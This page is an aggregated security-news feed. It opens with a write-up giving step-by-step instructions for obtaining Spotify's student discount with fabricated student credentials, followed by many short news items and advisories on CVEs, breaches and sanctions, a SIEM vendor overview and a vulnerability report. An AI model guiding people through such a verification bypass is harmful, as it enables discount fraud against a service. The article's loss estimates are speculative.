Spotify Is Losing Millions — Here’s How Anyone Can Hack Their Student DiscountImagine paying for a service, only to realize that an easily bypassed verification system allows anyone to access a 50% discount, even if they’re not eligible. This flaw in Spotify’s student discount program could cost them millions of dollars if left unchecked. In this article, we’ll explain how the exploit works, why it poses a significant issue for Spotify, and how it can be fixed before it spirals out of control.The Shocking Exploit: How Spotify’s Student Discount Is Leaking MoneySpotify’s Student Premium plan offers a 50% discount to students, allowing them to access premium features for just ₹59 per month, compared to the usual ₹129/month price tag. It’s a great deal for students, but here’s the problem: the verification process that ensures only actual students can access the discount is so flawed that anyone can bypass it — and even fraudsters can take advantage.Spotify uses a service called SheerID to authenticate students. The system works by asking for basic student information like an email address and an enrollment number. Once the details are provided, SheerID cross-checks the data to verify the student’s status. On paper, it sounds foolproof. But the reality is quite different.Due to weaknesses in the verification system, anyone can bypass the process by providing fake student details. All it takes is a fabricated email and a random student number — and the discount is yours.Step 1: Go to the Spotify Student Plan PageThe first thing you’ll need to do is head over to the Spotify Student Premium subscription page.Open your browser and search for “Spotify Student Premium” or directly navigate to Spotify’s student offer page.Step 2: Enter Fake Student DetailsSpotify uses SheerID to verify your student status, but the system only requires basic information — like an email address and an enrollment number. This is where the flaw lies: there’s no real verification behind this data.To exploit the system, simply enter any email address — there’s no requirement for it to be an official student email. Create a random student number (it could be any alphanumeric string) and proceed.Step 3: Bypass VerificationOnce you’ve submitted your fake details, SheerID will verify the information. However, since the system doesn’t cross-check the authenticity of the email or student number, as long as your information looks like it might belong to a student, you’ll be approved.Step 4: Confirm Your Discounted PlanAfter the verification process, you’ll gain access to Spotify’s Student Premium plan at the discounted rate of ₹59/month. You’ll now enjoy all the premium features, including ad-free listening and offline mode — without being a student at all for one year.The worst part? Spotify doesn’t check if the provided email really matches the student’s enrollment status, and anyone can easily generate a fake student number or email address.The Financial Fallout: Spotify Is Losing Thousands a DayHere’s the math behind it:Spotify’s regular Premium subscription costs $9.99/month.The Student Premium plan is just $4.99/month.That’s a $5 loss for every person who exploits the system.If only 1,000 users take advantage of this flaw (a conservative estimate), Spotify could lose $5,000 per month. This adds up to a massive $60,000 a year — just from 1,000 fraudulent users.Now, imagine how much Spotify is actually losing as this flaw potentially opens the door to thousands of fraudulent sign-ups. We’re talking about millions of dollars leaking out the door every year if this continues unchecked.The Real Impact: How This Affects Spotify and Its UsersThis isn’t just a technical issue — it’s a trust problem.This issue isn’t just about losing money — it’s about trust. Legitimate students who are paying for the discount could feel betrayed when they realize anyone can easily access it. This type of exploitation could lead to a growing sense of unfairness and resentment among paying users.Moreover, if news spreads about this flaw, it could damage Spotify’s reputation. Users may lose faith in the platform’s ability to protect its services, and if fraudulent activity becomes widespread, it could lead to a crisis of confidence that’s hard to recover from.The Bigger Picture: A Global Problem for SpotifySpotify, one of the most valuable streaming platforms in the world, made €16 billion in revenue in 2024. But even a small leak in their pricing system could result in millions of dollars in lost revenue. This isn’t just an internal issue — it’s a global problem affecting millions of users, including students who rely on discounts to afford premium services.If Spotify doesn’t address this flaw quickly, the financial and reputational damage could spiral out of control. The longer the exploit goes unaddressed, the larger the scale of the problem will become.The Hidden Cost of Not Fixing This FlawSpotify is essentially leaving the door wide open for fraudulent users to walk right in and get access to premium services for a fraction of the cost. If the platform doesn’t act quickly, this problem could grow into a full-scale financial crisis.With users all over the world potentially taking advantage of this loophole, the total losses could add up to millions of dollars each year — money that Spotify will never get back.Conclusion: The Clock Is TickingIn just a few minutes, you can bypass Spotify’s student verification and get a 50% discount on your Premium account. But while this exploit is easy to execute, it’s also a serious problem for Spotify.Disclaimer:Spotify has a significant vulnerability in its system that could easily cost them millions of dollars. The exploit is simple, but it comes with serious financial and reputational risks if left unchecked. This guide is intended for educational purposes only. Readers are strongly advised not to exploit the flaw, as doing so violates Spotify’s terms of service and could result in account penalties. We urge Spotify to address this issue before it grows into a larger crisis. Oh, and just to add a little cherry on top — I did report this issue to Spotify’s bug bounty program.The question is: How long will it take for Spotify to realize this flaw and fix it before the damage becomes irreversible?Spotify’s $60,000+ Security Flaw: Anyone Can Get Student Discounts for Free was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

As if losing your job when the startup you work for collapses isn’t bad enough, now a security researcher has found that employees at failed startups are at particular risk of having their data stolen. This ranges from their private Slack messages to Social Security numbers and, potentially, bank accounts. The researcher who discovered the […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

TikTok is back up in the United States after Trump announced today that he would extend a 90-day deadline for the company to find a U.S. purchaser. [...]

by BleepingComputer

TikTok shut down in the U.S. late Saturday night following the Supreme Court''s decision to uphold the law that banned the company over national security concerns. [...]

by BleepingComputer

Popular video-sharing social network TikTok has officially gone dark in the United States, as a federal ban on the app comes into effect on January 19, 2025. ""We regret that a U.S. law banning TikTok will take effect on January 19 and force us to make our services temporarily unavailable,"" the company said in a pop-up message. ""We''re working to restore our service in the U.S. as soon as possible

by The Hacker News

Russian nation-state actor Star Blizzard has been running a new spear-phishing campaign to compromise WhatsApp accounts of targets in government, diplomacy, defense policy, international relations, and Ukraine aid organizations. [...]

by BleepingComputer

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Attackers are encrypting AWS S3 data without using ransomware A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used. Configuration files for 15,000 Fortinet firewalls leaked. Are yours among them? A threat actor has leaked … More → The post Week in review: AWS S3 data encrypted without ransomware, data of 15k Fortinet firewalls leaked appeared first on Help Net Security.

by Help Net Security

TikTok is now unavailable in the United States—and getting around the ban isn’t as simple as using a VPN. Here’s what you need to know.

by WIRED Security News

This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2025-0411.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to partially bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-13179.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13180.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to partially bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-13181.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-13162.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13163.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.2. The following CVEs are assigned: CVE-2024-13164.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13165.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13166.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13167.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13168.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2024-13169.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13170.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13172.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-13158.

by Zero Day Initiative Advisories

The U.S. Treasury’s OFAC sanctioned a Chinese cybersecurity firm and a Shanghai cyber actor for ties to Salt Typhoon and a federal agency breach. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned Chinese firm Sichuan Juxinhe Network Technology Co., LTD., for its involvement in the activities of the Salt Typhoon APT group, […]

by Security Affairs

The alleged hacker claimed to have access to huge amounts of call records, including VP Kamala Harris and President Trump. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Using a VPN alone is no longer enough. Here''s how to pair the WireGuard protocol with your favorite VPN to protect your entire network.

by ZDNET Security

The Treasury Department announced sanctions in connection with a massive Chinese hack of American telecommunications companies and a breach of its own computer network. The post Treasury Levels Sanctions Tied to a Massive Hack of Telecom Companies and Breach of Its Own Network appeared first on SecurityWeek.

by SecurityWeek

School workers say they resorted to crowdsourcing help among each other following PowerSchool''s breach, fueled by solidarity and the slow response from PowerSchool. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The U.S. Treasury Department''s Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency. ""People''s Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent

by The Hacker News

Plus: New details emerge about China’s cyber espionage against the US, the FBI remotely uninstalls malware on 4,200 US devices, and victims of the PowerSchool edtech breach reveal what hackers stole.

by WIRED Security News

The Federal Trade Commission (FTC) has announced action against General Motors (GM) and its subsidiary, OnStar, for unlawful collection and sale of drivers'' precise geolocation and driving behavior data without first obtaining their consent. [...]

by BleepingComputer

As cyberthreats evolve and data privacy laws tighten, companies must address IT liability. Here are key steps every company should take.

by ITPro Today

TikTok said it will have to “go dark” this weekend unless Biden assures the company it won’t enforce a shutdown after the Supreme Court upheld the ban. The post TikTok Says It Will ‘Go Dark’ Unless It Gets Clarity From Biden Following Supreme Court Ruling appeared first on SecurityWeek.

by SecurityWeek

​Earlier this week, Ubisoft released Assassin''s Creed Valhalla and Assassin''s Creed Origins patches to fix Windows 11 24H2 compatibility issues that caused crashes, freezes, and audio problems. [...]

by BleepingComputer

CES 2025 showcased a blend of cutting-edge AI innovations and standout hardware, proving the future of tech is as imaginative as ever.

by ITPro Today

The U.S. Supreme Court has unanimously upheld a federal law banning TikTok unless its parent company, ByteDance, divests its ownership. This decision, grounded in national security concerns, has ignited debates over data privacy, free speech, and the broader impact of government intervention in tech regulation. With TikTok threatening to “go dark” on January 19 unless … The post TikTok Ban Sparks Debate Over Digital Privacy and Govt Control appeared first on CyberInsider.

by Cyber Insider

Hotel management platform Otelier has suffered a major data breach, exposing millions of guest reservations and personal details from well-known hotel brands such as Marriott, Hilton, and Hyatt. The breach, which began in July 2024 and persisted until October, resulted in nearly 8TB of data being stolen from the company''s Amazon S3 cloud storage. Otelier, … The post Otelier Breach Exposes Marriot, Hilton Bookings and Client Info appeared first on CyberInsider.

by Cyber Insider

Explore Bitcoin’s 2025 prospects, market trends, mining, and secure methods like cloud platforms. Learn strategies to manage risks…

by Hackread

noyb files complaints against TikTok, AliExpress, and other Chinese companies for illegal EU user data transfers to China, violating data protection laws. Austrian privacy non-profit group None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully […]

by Security Affairs

VC firms are focusing on both the technology and the teams behind AI startups, recognizing that successful investments will require adaptability, strategic direction, and innovation in a rapidly evolving market.

by ITPro Today

The Supreme Court has affirmed TikTok''s ban in the US, which has its users in revolt and is creating a whole new set of national cybersecurity concerns.

by Dark Reading

Social engineering and phishing are involved in 70% - 90% of data breaches. No other root cause of malicious hacking (e.g., unpatched software and firmware, eavesdropping, cryptography attacks, physical theft, etc.) comes close.

by KnowBe4

The FTC posted a preliminary report that said businesses do sometimes charge customers more for products based on insights gleaned from online behavior. The commission''s incoming GOP majority objected to the document''s release.

by The Record

On October 24, 2024, the Biden Administration released its National Security Memorandum (NSM) on Artificial Intelligence. Read along with AC Tech Programs staff, fellows, and industry experts for commentary and analysis. The post National Security Memorandum (NSM) on Artificial Intelligence: Democracy + Tech Initiative Markup appeared first on DFRLab.

by DFRLab

The propensity for users to enter customer data, source code, employee benefits information, financial data, and more into ChatGPT, Copilot, and others is racking up real risk for enterprises.

by Dark Reading

The South Dakota governor said efforts to address foreign disinformation campaigns were ""far off mission” for the Cybersecurity and Infrastructure Security Agency.

by The Record

The stolen firewall data is thorough but more than 2 years old now, meaning that most organizations following even basic security practices face minimal risk, hopefully.

by Dark Reading

The cyber actor played a role in the Treasury breach as well as attacks on critical infrastructure, linked to China-backed advanced persistent threat (APT) group Salt Typhoon.

by Dark Reading

Cybersecurity researchers have disclosed three security flaws in Planet Technology''s WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices. ""These switches are widely used in building and home automation systems for a variety of networking applications,"" Claroty''s Tomer Goldschmidt said in a Thursday report. ""An attacker

by The Hacker News

On Tuesday, January 14, 2025, a set of vulnerabilities were announced that affect the “rsync” utility. Rsync allows files and... The post Detecting and mitigating CVE-2024-12084: rsync remote code execution appeared first on Sysdig.

by Sysdig

As the US faces “the worst telecommunications hack in our nation’s history,” by China’s Salt Typhoon hackers, the outgoing FCC chair is determined to bolster network security if it’s the last thing she does.

by WIRED Security News

Cybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. ""Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps,"" Imperva researcher Daniel Johnston said in an analysis. ""These attacks

by The Hacker News

A recent ransomware attack on RECOPE, Costa Rica''s state-run energy company, was the first real-world test for FALCON, a new State Department program for foreign incident response, a top diplomat tells Recorded Future News.

by The Record

Phishing-as-a-Service kits intercept user credentials and 2FA, bypassing many email and secure web gateways.

by SC Media

The ability to detect, analyze, and respond to threats in real-time is critical. Security Information and Event Management solutions play a pivotal role in helping organizations achieve this by providing a comprehensive view of their IT environment, detecting anomalies, and offering actionable insights for incident response. The SIEM market has grown substantially, with numerous vendors offering a variety of solutions tailored to meet different business needs. In this article, we will explore the leading SIEM vendors and what they offer. What is SIEM Security Information and Event Management (SIEM) refers to the technology that combines security information management (SIM) and security event management (SEM). SIEM solutions collect and aggregate log data from a variety of sources (network devices, applications, security tools, etc.), providing real-time monitoring, event correlation, and security alerting. These solutions enable businesses to detect potential security breaches, respond promptly, and maintain compliance with industry regulations. Key functionalities of SIEM include: Log Management: Collecting and storing logs from diverse sources. Event Correlation: Analyzing logs to identify security threats. Alerting and Reporting: Triggering alerts based on suspicious activity and generating compliance reports. Incident Response: Providing information to facilitate the detection and resolution of security incidents. Leading SIEM Vendors in the Market Splunk Overview: Splunk is one of the most popular and well-known SIEM vendors, offering an advanced platform for searching, monitoring, and analyzing machine data. It provides a comprehensive security solution, allowing businesses to gain deep visibility into their IT infrastructure and respond to security incidents effectively. Key Features: Powerful search and analytics engine. Real-time security monitoring and alerting. Advanced correlation capabilities to detect complex threats. Scalability to handle large amounts of data. Best for: Enterprises requiring flexible, customizable, and highly scalable solutions. IBM QRadar Overview: IBM QRadar is a robust SIEM platform that offers comprehensive security monitoring, event correlation, and real-time data analysis. It integrates seamlessly with other IBM security products and provides a unified view of an organization’s security posture. Key Features: Advanced threat detection and analytics. Pre-configured security use cases for faster deployment. High-quality reporting and compliance support. Automated incident response workflows. Best for: Large enterprises and organizations with complex security environments. LogRhythm Overview: LogRhythm is a well-regarded SIEM vendor that focuses on providing an integrated security platform. It offers a comprehensive solution for threat detection, monitoring, and compliance. LogRhythm is known for its ease of use and ability to integrate with existing IT infrastructure. Key Features: Centralized log management and real-time event correlation. Advanced anomaly detection and behavioral analytics. Automated workflows for incident response. Out-of-the-box integrations with many security tools and systems. Best for: Mid-sized businesses looking for an intuitive, easy-to-deploy solution. SolarWinds Overview: SolarWinds is a well-known IT management company that also offers a powerful SIEM solution. SolarWinds’ SIEM solution is particularly well-suited for businesses looking for a cost-effective, scalable, and user-friendly platform. Key Features: Real-time monitoring and security event correlation. Incident response and alerting. Integrated network performance monitoring. Customizable dashboards and reports. Best for: Small to mid-sized businesses and organizations with a focus on network performance. AlienVault (AT&T Cybersecurity) Overview: AlienVault, now part of AT&T Cybersecurity, is an affordable, cloud-based SIEM solution that offers essential features for threat detection and compliance. It is popular among businesses that require a budget-friendly option with high-quality threat intelligence. Key Features: Built-in threat intelligence feeds. Automated log collection and analysis. Compliance reporting (PCI DSS, HIPAA, GDPR). Simple, easy-to-deploy solution with cloud-based options. Best for: Small businesses and organizations with limited resources seeking a user-friendly solution. Sumo Logic Overview: Sumo Logic is a cloud-native SIEM solution known for its ease of deployment and scalability. The platform is designed to handle large-scale environments and provides real-time analytics, monitoring, and insights. Key Features: Cloud-based architecture for seamless scalability. Real-time monitoring and log analytics. Machine learning-powered anomaly detection. Integrated compliance and security monitoring. Best for: Organizations adopting a cloud-first strategy and businesses with large, distributed environments. McAfee Enterprise Security Manager (ESM) Overview: McAfee’s Enterprise Security Manager (ESM) offers real-time threat intelligence, log management, and event correlation. It is particularly well-suited for organizations looking to integrate SIEM with McAfee’s security products for enhanced threat protection. Key Features: Automated incident detection and response. Centralized log management for large enterprises. Integration with McAfee’s security ecosystem. Compliance reporting and auditing. Best for: Enterprises with existing McAfee security solutions and those seeking deep integration with endpoint protection. Fortinet FortiSIEM Overview: FortiSIEM is a unified SIEM solution that offers comprehensive security monitoring, analytics, and response capabilities. The platform is integrated with Fortinet’s suite of cybersecurity solutions, providing enhanced visibility into network security. Key Features: Correlation of security events from multiple sources. Threat intelligence integration for better detection. Real-time monitoring and compliance reporting. Scalability for large and complex environments. Best for: Organizations already using Fortinet products or those needing a highly integrated security solution. Choosing the Right SIEM Vendor Selecting the right SIEM solution depends on various factors, including your organization’s size, complexity, security needs, and budget. Here are a few considerations to keep in mind when choosing a SIEM vendor: Scalability: Ensure the SIEM solution can scale as your organization grows. Ease of Use: Choose a platform that your team can easily deploy and manage. Integration: Ensure the SIEM solution can integrate with your existing security infrastructure and tools. Customization: Look for a solution that can be tailored to meet your organization’s specific security needs. Threat Intelligence: Ensure the solution provides strong threat intelligence feeds and advanced analytics for accurate threat detection. Conclusion The market for SIEM solutions is diverse, with many vendors offering specialized capabilities designed to meet the varying needs of businesses across different industries. Whether you’re a large enterprise or a small business, choosing the right SIEM vendor can significantly enhance your security posture by enabling better visibility, quicker threat detection, and more effective incident response. By understanding the strengths and capabilities of each SIEM vendor, organizations can make informed decisions and select the platform that best fits their needs, ultimately improving their overall cybersecurity defense.rtant: Your blog article will go under a review by one of our admin or moderator just to prevent spams and will approved or our moderators will get in touch with you to solve the issue or suggest improvements - essentially a editorial support.

by HACKLIDO

The FBI is reportedly in a panic over a possible leak of informant data thanks to an AT&T data breach

by SC Media

CISA and other agencies call to action for the US government to take steps to close the software understanding gap. The post US Government Agencies Call for Closing the Software Understanding Gap appeared first on SecurityWeek.

by SecurityWeek

Genshin Impact developer Cognosphere (aka Hoyoverse) has agreed to a $20 million settlement with the U.S. Federal Trade Commission (FTC) over its gacha loot box monetization and is now banned from selling them to teens under the age of sixteen without parental consent. [...]

by BleepingComputer

The US government has also sanctioned the hacker responsible for December''s US Treasury hack © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The theft of a PowerSchool engineer''s passwords prior to the breach raises further doubts about the company''s security practices. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

by SC Media

The ruling could have implications for other foreign-owned applications.

by SC Media

New order mandates securing the federal software supply chain and communications networks, as well as deploying AI tools to protect critical infrastructure from cyberattacks — but will the Trump administration follow through?

by ITPro Today

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...

by Malwarebytes Labs

Security researcher Simone Margaritelli has publicly disclosed a critical vulnerability in Apple’s Common UNIX Printing System (CUPS), revealing that the service fails to verify TLS certificates. This flaw allows attackers on the same network to impersonate IPP-over-HTTPS (IPPS) printers and intercept, modify, or redirect print jobs — potentially exposing sensitive data and enabling broader system … The post Apple’s CUPS Printing System Vulnerable to Spoofing Attacks appeared first on CyberInsider.

by Cyber Insider

Recent data breaches have highlighted the critical need to improve guest Wi-Fi infrastructure security in modern business environments. Organizations face increasing pressure to protect their networks while providing convenient access to visitors, contractors, temporary staff, and employees with BYOD. Implementing secure guest Wi-Fi infrastructure has become essential for authenticating access,

by The Hacker News

Cybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that''s capable of Microsoft 365 accounts with an aim to steal credentials and two-factor authentication (2FA) codes since at least October 2024. The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting

by The Hacker News

The U.S. Treasury Department''s Office of Foreign Assets Control (OFAC) sanctioned two individuals and four entities for their alleged involvement in illicit revenue generation schemes for the Democratic People''s Republic of Korea (DPRK) by dispatching IT workers around the world to obtain employment and draw a steady source of income for the regime in violation of international sanctions. ""These

by The Hacker News

by ComputerWeekly

Hotel management platform Otelier suffered a data breach after threat actors breached its Amazon S3 cloud storage to steal millions of guests'' personal information and reservations for well-known hotel brands like Marriott, Hilton, and Hyatt. [...]

by BleepingComputer

Advanced persistent threats (APTs) use sophisticated tools and techniques to breach systems and maintain access—all while remaining undetected. Unlike other cyberattacks, APTs work over an extended period, using more resources to achieve specific objectives, such as stealing sensitive data or bringing down operations.

by Legit Security

As LLMs broaden access to hacking and diversify attack strategies, understanding the thought processes behind these innovations will be vital for bolstering IT defenses.

by Dark Reading

Praetorian recently uncovered a denial-of-service vulnerability by chaining together path traversal and legacy file upload features in a CI/CD web application; highlighting the risks of undocumented features and the importance of input validation in web security. The post Tarbomb Denial of Service via Path Traversal appeared first on Praetorian.

by Praetorian

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Aviatrix Controllers vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical Aviatrix Controllers OS Command Injection vulnerability, tracked as CVE-2024-50603 (CVSS score of 10) to its Known Exploited Vulnerabilities (KEV) catalog. The flaw impacts Aviatrix Controller pre-7.1.4191 and 7.2.x […]

by Security Affairs

The Federal Trade Commission (FTC) has announced enforcement action against General Motors (GM) and its subsidiary, OnStar, for allegedly collecting and selling drivers'' precise geolocation and driving behavior data without proper consent. Under a proposed settlement, GM and OnStar will be barred from sharing such data with consumer reporting agencies for five years and must … The post FTC Bashes General Motors (GM) for Selling Driver Tracking Data appeared first on CyberInsider.

by Cyber Insider

A malicious package named ''pycord-self'' on the Python package index (PyPI) targets Discord developers to steal authentication tokens and plant a backdoor for remote control over the system. [...]

by BleepingComputer

Microsoft Threat Intelligence has uncovered a new spear-phishing campaign by the Russian threat actor Star Blizzard, marking a significant shift in their tactics. The campaign, observed in mid-November 2024, exploits WhatsApp’s account linking feature to gain unauthorized access to messages. This is the first time Star Blizzard has used WhatsApp as an attack vector, following … The post Star Blizzard Targets WhatsApp Accounts in Tricky QR Code Attack appeared first on CyberInsider.

by Cyber Insider

Check out the December updates in Compliance Plus so you can stay on top of featured compliance training content.

by KnowBe4

Imagine this scenario: A sophisticated, malicious phishing campaign targets a large financial institution. The attackers use emails generated by artificial intelligence (AI) that closely mimic the company’s internal communications. The emails contain malicious links designed to steal employee credentials, which the attackers could use to gain access to company assets and data for unknown purposes. […] The post How to calculate your AI-powered cybersecurity’s ROI appeared first on Security Intelligence.

by Security Intelligence

Ransomware groups claimed responsibility for 5,461 attacks in 2024, with 1,204 of these attacks being publicly confirmed by victim organizations, according to Comparitech’s latest Ransomware Roundup report.

by KnowBe4

I have helped people detect romance scams for decades. It is still very common for romance scammers to leverage both pictures of celebrities and pictures of innocent, everyday people as part of these scams. 

by KnowBe4

Key vulnerabilities in SAP, Microsoft, Fortinet, and others demand immediate attention as threat actors exploit critical flaws. Overview Cyble Research and Intelligence Labs (CRIL) analyzed significant IT vulnerabilities disclosed between January 8 and 14, 2025. The Cybersecurity and Infrastructure Security Agency (CISA) added seven vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Microsoft released its January 2025 Patch Tuesday updates, addressing 159 vulnerabilities, including eight zero-days, three of which are under active exploitation. Other notable vulnerabilities this week are flaws in SAP NetWeaver Application Server and other high-profile products. CRIL’s monitoring of underground forums also revealed discussions on critical zero-day vulnerabilities and their potential weaponization. Key Vulnerabilities SAP NetWeaver and BusinessObjects CVE-2025-0070: Improper authentication in SAP NetWeaver AS for ABAP, enabling privilege escalation. CVE-2025-0066: Weak access controls leading to unauthorized information disclosure. CVE-2025-0063: SQL injection vulnerability allowing unauthorized database manipulation. CVE-2025-0061: Session hijacking in SAP BusinessObjects, risking sensitive data exposure. Impact: SAP NetWeaver’s foundational role in critical industries like finance, healthcare, and manufacturing makes these vulnerabilities particularly concerning. Mitigation: Patches are available for all vulnerabilities, and immediate application is recommended. Fortinet FortiOS CVE-2024-55591: A critical authorization bypass vulnerability in FortiOS with a CVSS score of 9.8, allowing unauthorized users to execute arbitrary commands. Impact: Exploited in the wild, this vulnerability has been observed in attempts to gain super-admin privileges on affected systems. Mitigation: Upgrade FortiOS to the latest patched versions (7.0.17 or above for version 7.0 and 7.2.13 or above for version 7.2). Also read: Fortinet’s Authentication Bypass Zero-Day: Mitigation Strategies and IoCs for Enhanced Security Microsoft Hyper-V CVE-2025-21333, CVE-2025-21334, CVE-2025-21335: Use-after-free and buffer overflow vulnerabilities in Microsoft Hyper-V NT Kernel Integration VSP. Impact: These vulnerabilities pose risks of denial-of-service or privilege escalation within virtualized environments. Mitigation: Apply Microsoft’s January Patch Tuesday updates. Vulnerabilities on Underground Forums CRIL observed active discussions and Proof-of-Concept (PoC) code for vulnerabilities on underground forums: CVE-2024-55956: Critical unauthenticated file upload vulnerability in Cleo Harmony, VLTrader, and LexiCom products, allowing arbitrary code execution. Observed Activity: PoC shared on Telegram by a threat actor. CVE-2024-45387: SQL injection vulnerability in Apache Traffic Ops, enabling attackers to execute SQL commands against backend databases. Observed Activity: Threat actor ""dragonov_66"" posted PoC on cybercrime forums. Additionally, a threat actor advertised for sale zero-day pre-authentication Remote Code Execution (RCE) vulnerabilities affecting GoCloud Routers and Entrolink PPX VPN services. CISA’s Known Exploited Vulnerabilities (KEV) Catalog The following vulnerabilities were added to CISA’s KEV catalog: CVE ID Vendor Product CVSSv3 Exploitation CVE-2025-21335 Microsoft Windows 7.8 Not observed CVE-2024-55591 Fortinet FortiOS 9.8 Observed CVE-2023-48365 Qlik Sense 9.8 Observed CVE-2025-0282 Ivanti Connect Secure 9.0 Observed Also read: Inside the Active Threats of Ivanti’s Exploited Vulnerabilities Recommendations To mitigate risks associated with the identified vulnerabilities: Apply Patches Promptly: Install vendor-released patches for all affected products immediately. Use tools like Fortinet’s upgrade path utility for smooth version transitions. Implement Network Segmentation: Isolate critical assets using VLANs and firewalls. Restrict access to administrative interfaces through IP whitelisting. Monitor for Indicators of Compromise (IoCs): Analyze logs for suspicious activities, such as unauthorized account creation or modifications to security policies. Investigate IPs associated with malicious activity: 45.55.158.47 87.249.138.47 149.22.94.37 Strengthen Incident Response Plans: Regularly test and update incident response protocols to address emerging threats. Enhance Visibility: Maintain an up-to-date inventory of assets and perform regular vulnerability assessments. Adopt Multi-Factor Authentication (MFA): Ensure strong authentication measures for all accounts, especially admin accounts. Engage in Threat Intelligence Monitoring: Stay informed about security advisories from vendors and public authorities, including CISA and CERTs. The post Weekly IT Vulnerability Report: Critical Updates for SAP, Microsoft, Fortinet, and Others appeared first on Cyble.

by CYBLE

Explore how AI tools like OpenAI’s Sora face restrictions in Europe due to GDPR, with insights on bypassing…

by Hackread

